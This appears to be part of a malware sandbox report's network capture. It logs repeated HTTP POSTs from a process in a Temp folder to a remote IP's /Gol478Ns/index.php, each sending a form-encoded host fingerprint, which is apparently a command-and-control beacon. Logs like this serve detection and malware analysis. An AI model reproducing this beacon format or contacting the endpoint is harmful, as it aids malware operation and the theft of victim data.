                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.022146940 CET | 460 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    26 | 192.168.2.3 | 49728 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:23.125329971 CET | 227 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.190443993 CET | 227 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    260 | 192.168.2.3 | 49962 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:29.257081032 CET | 460 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.324227095 CET | 461 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    261 | 192.168.2.3 | 49963 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:29.504400969 CET | 461 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.568942070 CET | 462 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    262 | 192.168.2.3 | 49964 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:29.755517960 CET | 462 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:29.820144892 CET | 463 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    263 | 192.168.2.3 | 49965 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:30.025254965 CET | 463 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.089925051 CET | 464 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    264 | 192.168.2.3 | 49966 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:30.274781942 CET | 464 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.337826014 CET | 465 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    265 | 192.168.2.3 | 49967 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:30.528686047 CET | 465 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.592782021 CET | 466 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    266 | 192.168.2.3 | 49968 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:30.770420074 CET | 466 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:30.833966017 CET | 467 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 267 | Source IP: 192.168.2.3 | Source Port: 49969 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:31.022856951 CET | kBytes transferred: 467 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:31.088211060 CET | kBytes transferred: 468 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 268 | Source IP: 192.168.2.3 | Source Port: 49970 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:31.302961111 CET | kBytes transferred: 468 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:31.366622925 CET | kBytes transferred: 469 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 269 | Source IP: 192.168.2.3 | Source Port: 49971 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:31.549737930 CET | kBytes transferred: 469 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:31.611403942 CET | kBytes transferred: 470 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:31 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 27 | Source IP: 192.168.2.3 | Source Port: 49729 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:23.382591963 CET | kBytes transferred: 228 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:23.446644068 CET | kBytes transferred: 228 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 270 | Source IP: 192.168.2.3 | Source Port: 49972 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:32.067364931 CET | kBytes transferred: 470 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:32.132452011 CET | kBytes transferred: 471 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 271 | Source IP: 192.168.2.3 | Source Port: 49973 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:32.423801899 CET | kBytes transferred: 471 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:32.487102985 CET | kBytes transferred: 472 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 272 | Source IP: 192.168.2.3 | Source Port: 49974 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:32.751955986 CET | kBytes transferred: 472 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:32.816646099 CET | kBytes transferred: 473 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:32 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 273 | Source IP: 192.168.2.3 | Source Port: 49975 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:35.139303923 CET | kBytes transferred: 473 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:35.204358101 CET | kBytes transferred: 474 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 274 | Source IP: 192.168.2.3 | Source Port: 49976 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:36.257085085 CET | kBytes transferred: 474 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:36.324114084 CET | kBytes transferred: 475 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 275 | Source IP: 192.168.2.3 | Source Port: 49977 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:36.501859903 CET | kBytes transferred: 475 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:36.565764904 CET | kBytes transferred: 476 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
